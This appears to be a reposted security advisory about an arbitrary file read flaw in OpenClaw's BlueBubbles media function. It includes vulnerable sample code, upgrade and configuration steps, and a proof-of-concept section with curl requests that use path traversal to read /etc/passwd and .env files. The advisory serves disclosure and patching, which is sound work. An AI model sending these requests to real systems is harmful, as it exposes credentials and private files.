Listen to this Post
The BlueBubbles extension in OpenClaw versions prior to 2026.2.14 contains a path traversal vulnerability. The `sendBlueBubblesMedia` function improperly handles the `mediaPath` parameter. When a non-HTTP media source is provided, the function resolves it as a local filesystem path and reads the file directly from disk without any validation. The vulnerable code lacks an allowlist of safe directories, allowing an attacker to request arbitrary system files. By supplying a path like `../../../../etc/passwd` or its equivalent on other operating systems, an attacker can force the application to read sensitive local files. These files are then exfiltrated as media attachments. The fix implements two security measures: it introduces a required configuration setting (channels.bluebubbles.mediaLocalRoots) that defines explicit trusted directories, and it enforces canonical-path containment checks to verify that resolved paths stay within the allowed roots before reading any local file. The fix is implemented in commit 71f357d.
Platform: openclaw (npm)
Version: < v2026.2.14
Vulnerability: Arbitrary file read
Severity: High
Date: February 18, 2026
Prediction: Patch already planned
What Undercode Say:
Analytics
The vulnerability exists in the `sendBlueBubblesMedia` function. Review the vulnerable code pattern:
// Vulnerable code pattern (simplified)
async function sendBlueBubblesMedia(mediaPath) {
if (!mediaPath.startsWith('http')) {
// No path validation - reads any file
const fileContent = await fs.readFile(mediaPath);
return sendAsAttachment(fileContent);
}
}
Check if your version is affected:
npm list openclaw If version < 2026.2.14, vulnerable
Exploit:
Proof of concept demonstrating file exfiltration:
Exploit using the vulnerable mediaPath parameter
curl -X POST https://target.openclaw.instance/sendMedia \
-H "Content-Type: application/json" \
-d '{
"mediaPath": "/etc/passwd",
"channel": "bluebubbles"
}'
Alternative path traversal examples
curl -X POST https://target.openclaw.instance/sendMedia \
-d '{"mediaPath":"../../../.env","channel":"bluebubbles"}'
Protection:
Upgrade to patched version and configure allowed paths:
Update to fixed version npm install [email protected] Configure in your OpenClaw config file cat >> config.json << EOF { "channels": { "bluebubbles": { "mediaLocalRoots": ["/app/uploads", "/app/media"] } } } EOF
Verify the fix implementation:
Check if patch is applied grep -r "canonical-path" node_modules/openclaw/ Expected: containment checks present
Impact
An attacker with the ability to trigger BlueBubbles media sends can exfiltrate any local file accessible to the OpenClaw process. This includes sensitive system files like /etc/passwd, application configuration files containing API keys and database credentials, private SSH keys, and source code. The vulnerability effectively bypasses all filesystem access controls, leading to complete disclosure of data readable by the application process.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

